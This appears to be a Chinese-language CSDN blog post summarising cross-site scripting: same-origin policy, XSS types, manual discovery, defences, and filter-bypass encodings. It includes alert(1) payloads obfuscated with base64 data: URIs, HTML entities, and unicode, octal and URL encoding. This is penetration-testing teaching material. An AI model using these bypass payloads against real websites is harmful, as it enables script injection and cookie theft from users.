XSS知识点总结

最新推荐文章于 2022-10-24 15:38:39 发布
最新推荐文章于 2022-10-24 15:38:39 发布
阅读量421 收藏 1
点赞数
分类专栏: 渗透测试 文章标签: XSS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jerry____/article/details/95060280
版权

浏览器遵守同源策略

javaScript同源对比:协议、域名、端口三者完全相同即是同源。
HTML中不受同源策略限制的标签:

<script src = http://xss.tv/jquery.js>
<img src = http://xss.tv/back.jpg>
<iframe src = >
<link src = >

XSS 跨站脚本攻击

XSS危害:

盗取用户的Cookie
XSS Worm : XSS蠕虫
挂马 : A->B->C(互相传染)

XSS分类:

反射性XSS:浏览器发出请求,将js代码作为参数提交到服务器,服务器响应,输出在网站中
存储型XSS:浏览器发出请求,将js代码存储到服务器数据库或者文件中,永久存在,每次打开都会响应
DOM XSS:不需要服务器响应,直接靠浏览器的dom解析,完全是客户端的事情,与服务器无关

XSS手动挖掘

1.看url参数输出的位置
2.看输入框的输出位置

1.输出在标签外
构造标签,如果不能构造标签就不存在XSS漏洞
2.输出在标签内
需要闭合引号,如果不能闭合引号就看看当前标签是否可以执行js代码。
3.输出在script标签中
如果在引号内,需要闭合引号
如果不能闭合引号,看看当前位置是否可以能否innerHTML或者document.write,插入到网页中,引号内部可以使用unicode编码, < 不能编码
如果可以闭合引号,直接写入js代码

XSS防御

1.构造黑名单,白名单(白名单效果好,要考虑用户体验)
2.在cookie中添加httponly属性,保护cookie,减少损失

XSS编码问题及绕过

URL编码:
#->%23 .->%2e + ->%2b
"->%22 < %3c > %3e '->%27
HTML实体编码
< : $#60
: => [冒号] => [换行]
JS编码
1.三个八进制数字,不够前面补0; < \074
2.两个十六进制数字,不够前面补0 < \x3c
3.四个十六进制数字,不够前面补0 < \u003c

具体场景方法:

一:如果过滤了<> 等

<img src = x onerror = alert(1)>=>PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg(base64编码)

data协议
data:资源类型;编码类型,内容

<a href = "data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">123</a>

二:HTML实体编码

<img src = 1 onerror = "alert(1)">    =》
<img src=1 onerror="\u0061\u006c\u0065\u0072\u0074(1)"> (unicode编码)=》
<img src=1 onerror="&#0097;&#0108&#000101&#114;&#116;&#40;&#39;&#120;&#115;&#115;&#39;&#41;">(16进制)

三:JavaScript编码
javascript中只识别几种编码:Jsunicode js8进制 js16进制

js中如果过滤了 ’ " < > & % 等等 可以把输入的值改成js编码如:

<img src = x onerror = alert(1)>  =》
\74\151\155\147\40\163\162\143\75\170\40\157\156\145\162\162\157\162\75\141\154\145\162\164\50\61\51\
URL编码
如<a href = "javascript:alert(1)">123</a>  =》
  <a href = "j&#x000061;vascript:%61lert(1)">click me</a>

用img就不行:<img src=1 onerror=”javascript:%61lert(1)>
Jerry____
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
FE-Interview-Questions:关注公众号「前端进阶之旅」,一起学习。前端面试常考问题整理,按模块知识点分类 Front-end-Developer-Questions by Modules and knowledge
04-13
FE-Interview-Questions 前端面试常考问题分类整理汇总 目录 PS SEO ES6 cross-domain cookie MVC Git data-structure dataBase Handwritten-code computer-basic-knowledge other comprehensive vue react MVVM 浏览器 性能 安全问题:CSRF和XSS 创建对象和原型链 跨域通信类 面向对象:类的定义和继承的几种方式 前端错误监控 页面布局 CSS盒模型及BFC DOM事件的总结 HTTP协议 综合版本 Interview-Questions Front-end-Developer-Questions[question-and-answer-version]
XSS相关知识点
weixin_50931715的博客
08-03 1156
它是基于DoM文档对象模型的一种漏洞,并且DOM型XSS是基于JS上的,并不需要与服务器进行交互。不同于反射型XSS和存储型XSS,基于DOM的XSS跨站脚本攻击往往需要针对具体的 Javascript DOM代码进行分析,并根据实际情况进行XSS跨站脚本攻击的利用。形成XSS漏洞的主要原因是程序对输入和输出的控制过滤不够完善、严格,导致“精心构造”的脚本输入后,在输到前端时被浏览器当作有效代码解析执行从而产生危害。在危害性上:存储型XSS > DOM-XSS > 反射型XSS。二、XSS产生的原因。...
XSS知识点
禅心之道的博客
05-22 278
一、什么是XSS? XSS全称是Cross Site Scripting即跨站脚本,当目标网站目标用户浏览器渲染HTML文档的过程中,出现了不被预期的脚本指令并执行时,XSS就发生了。 这里我们主要注意四点:1、目标网站目标用户;2、浏览器;3、不被预期;4、脚本。 二、XSS有什么危害? 当我们知道了什么是XSS后,也一定很想知道它到底有什么用,或者有什么危害,如何防...
XSS基础知识
AmyBaby00的博客
09-29 707
XSS原理 XSS漏洞的问题,主要是由于开发人员对XSS了解不足,安全的意识不够造成的。现在让我们来普及一下XSS的一些常识 XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。 它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意的特殊目的。XSS属于被动式的攻击,因为其被动且不好利用,所以许多人常呼略其危害性。 在xss攻击中,通过插入恶意脚本,实现对用户游览器的控制。 XSS攻击的主要目的则是,想办法获取
XSS学习总结21篇
qq_45300786的博客
06-18 617
所有的文章都是看源码分析的,但是我这里推荐用抓包工具看输出 这里我要补充一下xss的相关知识(这里非常非常重要,如果连这些都不知道,是很难做xss的) 一、html标签里可以继续写html标签 <p>giegie,我你男朋友不会揍我吧<script>alert(1)</script></p> 二、html元素的属性可以触发事件(https://www.runoob.com/html/html-attributes.html) HTML 属性 HTML 元素可
防范XSS攻击程序
07-29
输入转义 对用户输入的所有数据进行拦截,检测是否含有XSS攻击关键字,如果存在XSS攻击关键字,对一些特殊字符,如:“<”、“>”、“&”等进行转义。 实现方案 自定义一个Filter拦截器,使用 Filter来过滤浏览器发出的请求,检测每个请求的参数是否含有XSS攻击关键字,如果存在xss攻击关键字,转义特殊字符。 方法是实现一个自定义的 HttpServletRequestWrapper ,然后在 Filter 里面调用它,重写getParameter, getParameterValues 函数即可。
XSS测试闭合的正确使用方式
u014171100的博客
12-16 4986
测试XSS漏洞的时,不少同鞋会从大量Payload中随便挑选几个顺眼来尝试,没有弹窗就放弃了,这种方法并不是很科学,一些稍微隐秘点的XSS基本都能逃过这样的检查。下面我将从XSS的本质讲起,给各位分享一下我的XSS测试方法。 XSS属于注入类漏洞,其本质是:在前端代码中用户可以控制内容的地方(简称可控点),拼接上一段可被浏览器执行的新语句。这里可被浏览器执行是关键,不管你正在测试的点是否有漏洞,首先拼接上去的脚本同上下文看来,需要一定程度的符合前端代码的语法结构。 ...
XSS闯关练习
Alsn86的博客
02-05 432
XSS闯关练习 第一关 </h2><script>alert(111)</script>直接弹 第二关 有两个位置回显,但是其中一个位置对特殊字符做了转义,所以我们对另一个位置(input标签)下手 111"><script>alert(123)</script> 第三关 ...
XSS总结
m0_59134926的博客
10-24 451
关于xss的一些事
xss总结
nigo134的博客
07-16 412
1.通过拼接html标签绕过htmlspecialchars() ini_set("display_errors", 0); $str = $_GET["keyword"]; echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center> <form action=level2.php method=GET> <input name=keyword val.
XSS注入知识点总结.pdf
02-07
该文档是在看网络学习视频总结,从XSS漏洞概述,XSS分类,XSS构造,XSS变形,XSS的利用,XSS的防御进行总结,分章节进行叙述,可作为学习文档。
Java安全知识点总结
最新发布
04-20
Java安全知识点涵盖了一系列与Java编程和应用程序开发相关的安全概念、实践和技术。以下是一些常见的Java安全知识点: 输入验证:在Java应用程序中,输入验证是非常重要的安全措施,以防止用户提供恶意或恶意格式化...
开发代码安全规范-防SQL注入和XSS跨站攻击代码编写规范.doc
07-14
下面是关于防SQL注入和XSS跨站攻击代码编写规范的详细知识点: 一、SQL注入(SQL Injection) 1.1 名词解释:SQL注入攻击是一种通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗...
百度地图毕业设计源码-frontend-interview-point:前端面试知识点整理
06-06
前端面试知识点整理 目录 viewport meta 语义 排版 绘制 动画 理解和还原设计图意 其它 基本概念 函数 对象 内置对象 正则 ES6 DOM API CSSDOM canvas BOM 状态码 头 方法 vue react angular AMD CMD CommonJS UMD ...
【ASP.NET编程知识】ASP.NET笔记之CKEditor的使用方法.docx
05-18
本文将详细介绍 CKEditor 在 ASP.NET 中的使用方法,包括配置、引入、权限控制等方面的知识点。 一、CKEditor 的配置 CKEditor 的配置主要涉及到 adapters、images、lang、plugins、skins、themes、ckeditor.js、...
XSS漏洞介绍
Andrew的博客
02-15 1424
一.什么是XSS跨站脚本 XSS(Cross Site Scripting)跨站脚本诞生于1996年。XSS一直被OWASP(Open Web Application Security Project)组织评为十大安全漏洞中的第二威胁漏洞,也有黑客把跨站脚本当做新型的“缓冲区溢出攻击”,而JavaScript则是新型的Shellcode。2011年6月份,国内知名信心发布平台新浪微博爆发了XSS...
OWASP TOP 10
weixin_45515936的博客
04-01 305
OWASP TOP 10 13年版已升级-2017版本 参考: https://blog.csdn.net/wang_624/article/details/89683571?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522159198134219725211934408%2522%252C%2522scm%2522%253A%252220140713.130102334…%2522%257D&request_id=15919813
XSS靶场通关
ANYOUZHEN的博客
05-20 1734
leve1 反射型xss,将name后面的值test改为 <script>alert('xss')</script> level2 查看后端代码 得先将前面闭合 ,并且用//将后面的代码注释掉 左边的">去闭合原先的",右边的//去注释原先的"> "><script>alert('xss')</script>// level3 输入test进行尝试,发现没有成功,观察后端代码 猜测服务器端在这两处都用
XSS知识汇总
公众号shadow sock7
06-19 774
xss如何加载远程js的一些tips』 http://www.freebuf.com/articles/web/24496.html 『打造一个自动检测页面是否存在XSS的插件(完结篇)』 http://www.freebuf.com/sectool/82743.html 『说一说新手在寻找XSS时所存在的一些误区』 http://www.freebuf.com/articles/web
渗透测试XSS基础知识
07-23
XSS(Cross-Site Scripting)是一种常见的网站安全漏洞,攻击者通过在网页中注入恶意脚本来攻击用户。以下是关于 XSS 的基础知识: 1. XSS 的原理:XSS 攻击利用了网站对用户输入的信任,攻击者将恶意脚本注入到网页中,当用户浏览该网页时,恶意脚本会在用户的浏览器中执行,从而达到攻击的目的。 2. XSS 的分类:XSS 可以分为三种主要类型:存储型(Stored XSS)、反射型(Reflected XSS)和 DOM 型(DOM-based XSS)。存储型 XSS 注入的恶意脚本被存储在目标网站的数据库中,当其他用户访问该页面时,恶意脚本会被执行。反射型 XSS 注入的恶意脚本通过 URL 参数传递给目标网站,目标网站在返回的页面中直接输出了这些恶意脚本,用户点击链接时脚本被执行。DOM 型 XSS 则是利用了网页的 DOM 结构,通过修改 DOM 中的内容来触发漏洞。 3. XSS 的危害:XSS 攻击可以导致许多危害,包括盗取用户的敏感信息(如用户名、密码、cookie)、篡改网页内容、进行钓鱼攻击、传播恶意软件等。 4. 防御 XSS 的措施:为了防止 XSS 攻击,可以采取以下措施: - 输入验证和过滤:对用户输入的数据进行验证和过滤,过滤掉不可信的字符和脚本。 - 输出转义:将用户输入的数据进行转义,确保输出到网页时不会被浏览器解析为可执行的脚本。 - 使用 HTTP 头部中的 Content Security Policy(CSP)来限制网页的资源加载和执行。 - 设置 HttpOnly 属性来限制 JavaScript 对 cookie 的访问。 - 定期更新和修复网站的漏洞,以防止攻击者利用已知的 XSS 漏洞。 以上是关于 XSS 的基础知识,深入了解 XSS 攻击的原理和防御措施对于网站安全至关重要。在进行渗透测试时,理解 XSS 的工作原理和常见漏洞场景可以帮助你更好地发现和利用 XSS 漏洞。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值